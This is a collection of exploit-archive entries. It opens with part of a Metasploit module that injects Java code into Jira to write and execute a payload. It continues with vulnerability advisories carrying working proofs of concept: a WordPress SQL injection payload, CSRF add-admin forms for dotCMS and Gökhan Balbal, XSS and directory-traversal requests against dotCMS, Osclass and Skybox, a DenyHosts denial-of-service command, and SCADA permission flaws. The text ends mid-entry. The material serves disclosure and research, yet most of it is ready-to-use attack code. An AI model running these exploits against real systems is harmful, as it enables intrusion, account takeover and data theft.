a file. # # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code, # and then execute the new file instead. # # @param fname [String] File to write to. # @param p [String] Payload # @return [String] def get_write_file_code(fname, p) b64 = Rex::Text.encode_base64(p) %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) | end # Returns the Java code that gives us the remote Java home path. # # @return [String] def get_java_path_code get_java_property_code('java.home') end # Returns the OS/platform information. # # @return [String] def get_os_detection_code get_java_property_code('os.name') end # Returns the temp path for Java. # # @return [String] def get_temp_path_code get_java_property_code('java.io.tmpdir') end # Returns a system property for Java. # # @param prop [String] Name of the property to retrieve. # @return [String] def get_java_property_code(prop) %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() | end # Returns the Java code to execute a jar file. # # @param java_path [String] Java home path # @param war_path [String] The jar file to execute # @return [String] def get_jar_exec_code(java_path, war_path) # A quick way to check platform instead of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === war_path normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java') cmd_str = %Q|#{normalized_java_path} -jar #{war_path}| else normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe') war_path.gsub!(/Program Files/, 'PROGRA~1') cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"| end %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() | end # Returns Java code that can be used to inject to the template in order to execute a file. # # @param cmd [String] command to execute # @return [String] def get_exec_code(cmd) %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() | end # Returns Java code that can be used to inject to the template in order to chmod a file. # # @param fname [String] File to chmod # @return [String] def get_chmod_code(fname) get_exec_code("chmod 777 #{fname}") end # Returns Java code that can be used to inject to the template in order to copy a file. # # @note The purpose of this method is to have a file that is not busy, so we can execute it. # It is meant to be used with #get_write_file_code. # # @param fname [String] The file to copy # @param new_fname [String] The new file # @return [String] def get_dup_file_code(fname, new_fname) if fname =~ /^\/[[:print:]]+/ cp_cmd = "cp #{fname} #{new_fname}" else cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}" end get_exec_code(cp_cmd) end # Returns a boolean indicating whether the module has a username and password. # # @return [TrueClass] There is an empty cred. # @return [FalseClass] No empty cred. def jira_cred_empty? jira_username.blank? || jira_password.blank? end # Injects Java code to the template. # # @param p [String] Code that is being injected. # @param cookie [String] A cookie that contains a valid JSESSIONID # @return [void] def inject_template(p, cookie) login_sid = get_cookie_as_hash(cookie)['JSESSIONID'] uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render') uri << '/' res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "JSESSIONID=#{login_sid}", 'ctype' => 'application/json', 'data' => { 'message' => p }.to_json }) if !res # This seems to trigger every time even though we're getting a shell. So let's downplay # this a little bit. At least it's logged to allow the user to debug. elog('Connection timed out in #inject_template') elsif res && /Error report/ === res.body print_error('Failed to inject and execute code:') vprint_line(res.body) elsif res vprint_status("Server response:") vprint_line res.body end res end # Checks if the target os/platform is compatible with the module target or not. # # @return [TrueClass] Compatible # @return [FalseClass] Not compatible def target_platform_compat?(target_platform) target.platform.names.each do |n| if /^java$/i === n || /#{n}/i === target_platform return true end end false end # Returns the normalized file path for payload. # # @return [String] def normalize_payload_fname(tmp_path, fname) # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === tmp_path Rex::FileUtils.normalize_unix_path(tmp_path, fname) else Rex::FileUtils.normalize_win_path(tmp_path, fname) end end # Returns a temp path from the remote target. # # @param cookie [String] Jira cookie # @return [String] def get_tmp_path(cookie) c = get_temp_path_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Returns the Java home path used by Jira. # # @param cookie [String] Jira cookie. # @return [String] def get_java_home_path(cookie) c = get_java_path_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Exploits the target in Java platform. # # @return [void] def exploit_as_java(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") jar = payload.encoded_jar java_home = get_java_home_path(cookie) register_files_for_cleanup(jar_fname) if java_home.blank? fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') else print_status("Found Java home path: #{java_home}") end print_status("Attempting to write #{jar_fname}") c = get_write_file_code(jar_fname, jar) inject_template(c, cookie) print_status("Executing #{jar_fname}") c = get_jar_exec_code(java_home, jar_fname) inject_template(c, cookie) end # Exploits the target in Windows platform. # # @return [void] def exploit_as_windows(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") exe_fname.gsub!(/Program Files/, 'PROGRA~1') exe_new_fname.gsub!(/Program Files/, 'PROGRA~1') register_files_for_cleanup(exe_fname, exe_new_fname) print_status("Attempting to write #{exe_fname}") c = get_write_file_code(exe_fname, exe) inject_template(c, cookie) print_status("New file will be #{exe_new_fname}") c = get_dup_file_code(exe_fname, exe_new_fname) inject_template(c, cookie) print_status("Executing #{exe_new_fname}") c = get_exec_code(exe_new_fname) inject_template(c, cookie) end # Exploits the target in Linux platform. # # @return [void] def exploit_as_linux(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) register_files_for_cleanup(fname, new_fname) print_status("Attempting to write #{fname}") p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) c = get_write_file_code(fname, p) inject_template(c, cookie) print_status("chmod +x #{fname}") c = get_exec_code("chmod 777 #{fname}") inject_template(c, cookie) print_status("New file will be #{new_fname}") c = get_dup_file_code(fname, new_fname) inject_template(c, cookie) print_status("Executing #{new_fname}") c = get_exec_code(new_fname) inject_template(c, cookie) end def exploit if jira_cred_empty? fail_with(Failure::BadConfig, 'Jira username and password are required.') end print_status("Attempting to login as #{jira_username}:#{jira_password}") cookie = do_login print_good("Successfully logged in as #{jira_username}") target_platform = get_target_platform(cookie) print_status("Target being detected as: #{target_platform}") unless target_platform_compat?(target_platform) fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') end case target.name when /java$/i exploit_as_java(cookie) when /windows$/i exploit_as_windows(cookie) when /linux$/i exploit_as_linux(cookie) end end def print_status(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end end

iniNet SpiderControl SCADA Web Server Service 2.02 Insecure File Permissions Vendor: iniNet Solutions GmbH Product web page: http://www.spidercontrol.net Affected version: 2.02.0000 Summary: Modular and automated engineering is provided for HMI and SCADA. The tools are developed to join a large range of engineering modules together quickly. We modularize our software, as the mechanics of a system are modularized today. Easy to visualize with a few clicks. Desc: SpiderControl SCADA Web Server Service suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'C' flag (Change) for 'Everyone' and 'Authenticated Users' group making the entire directory 'WWW' and its files and sub-dirs world-writable. Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5284 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5284.php 22.10.2015 -- C:\WWW>dir Volume in drive C is Windows Volume Serial Number is 56F3-8688 Directory of C:\WWW 22/10/2015 10:54 <DIR> . 22/10/2015 10:54 <DIR> .. 22/10/2015 10:55 <DIR> HMI 07/02/2008 23:41 147,968 libnodave.dll 22/10/2015 10:54 <DIR> Manual 07/07/2015 12:03 1,687,552 SCADAControlPanel.exe 07/07/2015 12:03 203,776 ScadaWindowsService.exe 22/10/2015 10:54 3,092 unins000.dat 22/10/2015 10:53 719,496 unins000.exe 07/07/2015 12:07 793,088 ZelsWebServ.dll 22/10/2015 10:54 1,546 ZelsWebServ.xml 22/10/2015 10:55 38,696 ZelsWebServ_log.txt 8 File(s) 3,595,214 bytes 4 Dir(s) 77,683,298,304 bytes free C:\WWW>cacls *.exe C:\WWW\SCADAControlPanel.exe Everyone:C BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\WWW\ScadaWindowsService.exe Everyone:C BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\WWW\unins000.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C --- C:\Users\joxy>sc qc SCADAServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SCADAServer TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\WWW\ScadaWindowsService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SCADA Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem

iniNet SpiderControl PLC Editor Simatic 6.30.04 Insecure File Permissions Vendor: iniNet Solutions GmbH Product web page: http://www.spidercontrol.net Affected version: 6.30.04 (Build 6300400) Summary: Modular and automated engineering is provided for HMI and SCADA. The tools are developed to join a large range of engineering modules together quickly. We modularize our software, as the mechanics of a system are modularized today. Easy to visualize with a few clicks. Desc: SpiderControl PLC Editor Simatic suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Everyone' group, and 'C' flag (Change) for 'Authenticated Users' group making the entire directory 'PLCEditorSimatic_6300400' and its files and sub-dirs world-writable. Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5283 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5283.php 22.10.2015 -- C:\SpiderControl\PLCEditorSimatic_6300400>cacls PLCEditorSimatic.exe C:\SpiderControl\PLCEditorSimatic_6300400\PLCEditorSimatic.exe Everyone:(ID)F BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\SpiderControl\PLCEditorSimatic_6300400>dir Volume in drive C is Windows Volume Serial Number is 56F3-8688 Directory of C:\SpiderControl\PLCEditorSimatic_6300400 22/10/2015 10:10 <DIR> . 22/10/2015 10:10 <DIR> .. 09/05/2012 14:03 379 fontconfig.txt 22/10/2015 10:10 <DIR> HTML5Comp 22/10/2015 10:10 <DIR> HWSpecific 24/06/2015 18:42 386,812 IMasterSimatic6_30_04.jar 22/10/2015 10:10 <DIR> ImportNConvertComp 22/10/2015 10:10 <DIR> MacroDlgComp 22/10/2015 10:10 <DIR> MacroDlgRuntime 22/10/2015 10:10 <DIR> MacroLib 22/10/2015 10:10 <DIR> MacroLibTempFiles 26/04/2005 15:26 320 MsgBox.teq 22/10/2015 10:10 <DIR> News_ReleaseNotes 06/06/2012 11:06 81 PLCEditorExtraBatch.bat 11/01/2013 12:29 727 PLCEditorKey.spl 02/07/2015 22:58 7,997,440 PLCEditorSimatic.exe 26/11/2014 19:04 3,806 PLCPPOCheckCfgSimaticPLC.xml 02/07/2015 18:25 2,958,336 PLC_FontGenerator.exe 22/10/2015 10:10 <DIR> Projects 17/06/2015 10:58 34,275 PropWndDescript.xml 25/04/2014 16:55 104,254 s7api.jar 18/05/2015 12:28 42,478 ScadaDescript.xml 10/01/2011 15:09 208 ScadaPPOList.csv 22/10/2015 10:10 <DIR> SCUtils 09/02/2015 13:27 8,242 SimaticDefaultSpiderHWProfile.shp 01/07/2015 16:36 2,693,569 SimaticPLCHelp.chm 22/10/2015 10:30 <DIR> SimulateRuntime 22/10/2015 10:10 <DIR> SimulationComp 06/09/2012 11:13 65,536 SpiderLink1.dll 06/09/2012 11:13 65,536 SpiderLink2.dll 06/09/2012 11:13 65,536 SpiderLink3.dll 06/09/2012 11:13 65,536 SpiderLink4.dll 02/07/2015 18:26 265,216 SpiderObserver.dll 02/07/2015 18:25 269,824 SpiderOPCBrowser.dll 02/07/2015 23:42 483,328 SPSVarSelectorCsv.dll 02/07/2015 18:26 430,080 SPSVarSelectorTpy.dll 22/10/2015 10:10 <DIR> SVGComp 22/10/2015 10:10 86,988 unins000.dat 22/10/2015 10:10 736,929 unins000.exe 10/01/2011 15:05 28 ZelsCfg.csv 22/10/2015 10:10 <DIR> ZipComp 25 File(s) 16,765,464 bytes 16 Dir(s) 77,686,059,008 bytes free C:\SpiderControl\PLCEditorSimatic_6300400>cd .. C:\SpiderControl>cacls PLCEditorSimatic_6300400 C:\SpiderControl\PLCEditorSimatic_6300400 Everyone:(OI)(CI)F BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability Author : WICS Date : 7/12/2015 Software Link : https://wordpress.org/plugins/polls-widget/ Affected Version: 1.0.7 and below Overview: Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll. This plugin has 2000+ active installations. Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id line no. 36 $question_id=$_POST['question_id']; .... .... line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A); print_r(json_encode($answer, JSON_FORCE_OBJECT)); this script is vulnerable to union based sql injection with column count 2 POC http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues in post data, add this question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5

 dotCMS 3.2.4 Multiple Vulnerabilities Vendor: dotCMS Software, LLC Product web page: http://www.dotcms.com Affected version: 3.2.4 (Enterprise) Summary: DotCMS is the next generation of Content Management System (CMS). Quick to deploy, open source, Java-based, open APIs, extensible and massively scalable, dotCMS can rapidly deliver personalized, engaging multi-channel sites, web apps, campaigns, one-pagers, intranets - all types of content driven experiences - without calling in your developers. Desc: The application suffers from multiple security vulnerabilities including: Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request Forgery (CSRF). Tested on: Apache-Coyote/1.1 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5290 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php Vendor: http://dotcms.com/docs/latest/change-log https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305 https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3 19.11.2015 -- 1. Open Redirect via '_EXT_LANG_redirect' GET parameter: -------------------------------------------------------- http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia 2. CSRF Add Admin: ------------------ <html> <body> <form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain"> <input type="hidden" name="callCount" value="1&#10;windowName&#61;c0&#45;param2&#10;c0&#45;scriptName&#61;UserAjax&#10;c0&#45;methodName&#61;addUser&#10;c0&#45;id&#61;0&#10;c0&#45;param0&#61;null&#58;null&#10;c0&#45;param1&#61;string&#58;TEST2&#10;c0&#45;param2&#61;string&#58;AAAA2&#10;c0&#45;param3&#61;string&#58;AAA2&#37;40bb&#46;net&#10;c0&#45;param4&#61;string&#58;123123&#10;batchId&#61;3&#10;instanceId&#61;0&#10;page&#61;&#37;2Fc&#37;2Fportal&#37;2Flayout&#37;3Fp&#95;l&#95;id&#37;3Da8e430e3&#45;8010&#45;40cf&#45;ade1&#45;5978e61241a8&#37;26p&#95;p&#95;id&#37;3DEXT&#95;USER&#95;ADMIN&#37;26p&#95;p&#95;action&#37;3D0&#37;26&#37;26dm&#95;rlout&#37;3D1&#37;26r&#37;3D1448026121316&#10;scriptSessionId&#61;hd2XkJoJcyP9lEk5N8qUe&#42;ouv5l&#47;mn17B5l&#45;IA&#42;1ZViJ6&#10;" /> <input type="submit" value="Tutaj" /> </form> </body> </html> 3. Multiple Stored And Reflected XSS: ------------------------------------- POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1 Host: 127.0.0.1 callCount=1 windowName=c0-param0 c0-scriptName=TagAjax c0-methodName=addTag c0-id=0 c0-param0=<script>alert(1)<%2fscript> c0-param1=string: c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20 batchId=2 instanceId=0 ...... POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1 Host: 127.0.0.1 callCount=1 windowName=c0-param5 c0-scriptName=CategoryAjax c0-methodName=saveOrUpdateCategory c0-id=0 c0-param0=boolean:true c0-param1=null:null c0-param2=<script>alert(2)<%2fscript> c0-param3=string:ppp c0-param4=string:aaa c0-param5=string:bbb batchId=2 instanceId=0 ...... POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1 Host: 127.0.0.1 query=aaaa offset="><script>alert(3)<%2fscript> limit=20 sort=1 userid=admin reindexResults=true ...... http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter] http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename] http://127.0.0.1/c/portal/layout [limit parameter] http://127.0.0.1/c/portal/layout [offset parameter] http://127.0.0.1/c/portal/layout [query parameter] http://127.0.0.1/c/portal/layout [sort parameter] http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter] http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]

source: https://www.securityfocus.com/bid/64478/info DenyHosts is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users. ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21

source: https://www.securityfocus.com/bid/64426/info Leed is prone to an SQL-injection vulnerability. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/leed/action.php?action=removeFolder&id=[SQL Injection]

source: https://www.securityfocus.com/bid/64386/info Osclass is prone to the following input-validation vulnerabilities: 1. A cross-site request-forgery vulnerability 2. Multiple directory-traversal vulnerabilities 3. An SQL-injection vulnerability Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, to view arbitrary local files and directories within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. Osclass 3.3 is vulnerable; other versions may also be affected. Cross-site request forgery: [!] Exploit Already Tested ... on apache [^] Error console:- /general/index.php [?] proof of concept : <html> <body onload="javascript:document.forms[0].submit()"> <form name="<empty>" action="http://www.example.com/general/index.php" method=GET enctype="multipart/form-data"> <input type=hidden size=30 maxlength=30 name=page value=""> <input type=hidden size=30 maxlength=30 name=sOrder value=""> <input type=hidden size=30 maxlength=30 name=iOrderType value=""> <td><input type=text size=30 maxlength=250 name=sPattern value=""></td> <td><input type=text size=30 maxlength=100 name=sCity value=""></td> <td><input type=text size=30 maxlength=100 name=sRegion value=""></td> <td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td> <input type=text size=30 maxlength=250 name=sPriceMin value=""></td> <td><input type=text size=30 maxlength=100 name=sPriceMax value=""></td> <td><input type=Checkbox size=10 maxlength=10 name=sCategory value=""></td> <input type=submit class=button value='Save'> </form> </html> Directory Traversal: [!] Exploit Already Tested ... on apache [^] Error console:- directory traversal allow to dump db [?] proof of concept : /general/oc-content/languages/en_US/mail.sql /general/oc-includes/osclass/installer/basic_data.sql /general/oc-includes/osclass/installer/pages.sql exploit http://www.example.com/general/oc-content/languages/en_US/mail.sql SQL injection: [!] Exploit Already Tested ... on apache [^] Error console:- 1*-URL encoded GET input action was set to -1' or 18 = '16 2*-URL encoded POST input action was set to -1" or 34 = "31 [?] proof of concept : /general/oc-admin/index.php /general/index.php 1*- RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1 X-Requested-With: XMLHttpRequest Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT Host: demo.osclass.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* 2*- POST /general/index.php HTTP/1.1 Content-Length: 246 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2 Host: demo.osclass.org Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst

source: https://www.securityfocus.com/bid/64499/info Hancom Office is prone to a remote heap-based buffer-overflow vulnerability. An attacker can exploit this issue by enticing an unsuspecting victim to open a malicious '.hml' document file. Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. Hancom Office 2010 SE 8.5.8 is vulnerable; Other versions may also be affected. <TEXTART Text="AAAAAAAA...(more than 500 bytes)" X0="0" X1="14173" X2="14173" X3="0" Y0="0" Y1="0" Y2="14173" Y3="14173">

.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Þeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Gökhan Balbal |~Affected Version : v2.0 |~Software : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html |~RISK : High |~Google Keyword : "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi" ##################++ Exploit ++ ###################################### <html> <body> <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST"> <input type="hidden" name="kadi" value="knockout" /> <input type="hidden" name="sifre" value="password" /> <input type="hidden" name="Submit" value="Exploit!" /> <input type="submit" value="Submit request" /> </form> </body> </html> ############################################################

SEC Consult Vulnerability Lab Security Advisory < 20151210-0 > ======================================================================= title: Multiple Vulnerabilities product: Skybox Platform vulnerable version: <=7.0.611 fixed version: 7.5.401 CVE number: impact: Critical homepage: www.skyboxsecurity.com/products/appliance found: 2014-12-04 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Skybox Security provides cutting-edge risk analytics for enterprise security management. Our solutions give you complete network visibility, help you eliminate attack vectors, and optimize your security management processes. Protect the network and the business." Source: http://www.skyboxsecurity.com/ Business recommendation: ------------------------ Attackers are able to perform Cross-Site Scripting and SQL Injection attacks against the Skybox platform. Furthermore, it is possible for unauthenticated attackers to download arbitrary files and execute arbitrary code. SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all available vulnerabilities in the Skybox platform and increase the security of its customers. Vulnerability overview/description: ----------------------------------- 1) Multiple Reflected Cross-Site Scripting Vulnerabilities 2) Multiple Stored Cross-Site Scripting Vulnerabilities 3) Arbitrary File Download and Directory Traversal Vulnerability 4) Blind SQL Injection Vulnerability 5) Remote Unauthenticated Code Execution Proof of concept: ----------------- 1) Multiple Reflected Cross-Site Scripting Vulnerabilities Multiple scripts are prone to reflected Cross-Site Scripting attacks. The following example demonstrates this issue with the service VersionRepositoryWebService: POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0 Content-type: text/plain User-Agent: Axis/1.4 Host: localhost:8282 SOAPAction: "" Content-Length: 863 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:checkV ersion soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85">&l t;a xmlns:a=&apos;http://www.w3.org/1999/xhtml&apos;><a:body onload=&apos;alert(1)&apos;/></a>9884933253b"><components soapenc:arrayType="soapenc:string[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><components xsi:type="soapenc:string">Application</components></components><os xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">windows-64</os><curre ntVersion xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">7.0.601</currentVersi on></ns1:checkVersion></soapenv:Body></soapenv:Envelope> Other scripts and parameters, such as the parameter status of the login script (located at https://localhost:444/login.html) are affected as well. The following request demonstrates this issue: https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc ument.cookie%29%3C/script%3E 2) Multiple Stored Cross-Site Scripting Vulnerabilities Multiple fields of the Skybox Change Manager, which can be accessed at https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting attacks. For example when creating a new ticket, the title can be misused to insert JavaScript code. The following request to the server demonstrates the issue: Request: POST /skyboxview/webskybox/tickets HTTP/1.1 Host: localhost:8443 [...] 7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.g wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer .modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer. netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel. TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8 52682809||skyboxview|test"><img src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41 Other fields, like "Comments" and "Description", are affected as well. 3) Arbitrary File Download and Directory Traversal Vulnerability Skybox Change Manager allows to upload and download attachments for tickets. The download functionality can be exploited to download arbitrary files. No authentication is required to exploit this vulnerability. The following request demonstrates the issue: POST /skyboxview/webskybox/attachmentdownload HTTP/1.1 Host: localhost:8443 tempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/ win.ini The script /skyboxview/webskybox/filedownload is also affected by the same vulnerability. Note: The upload functionality can also be used to upload files without authentication. 4) Blind SQL Injection Vulnerability Arbitrary SQL queries can be inserted into the service VersionWebService. The following request 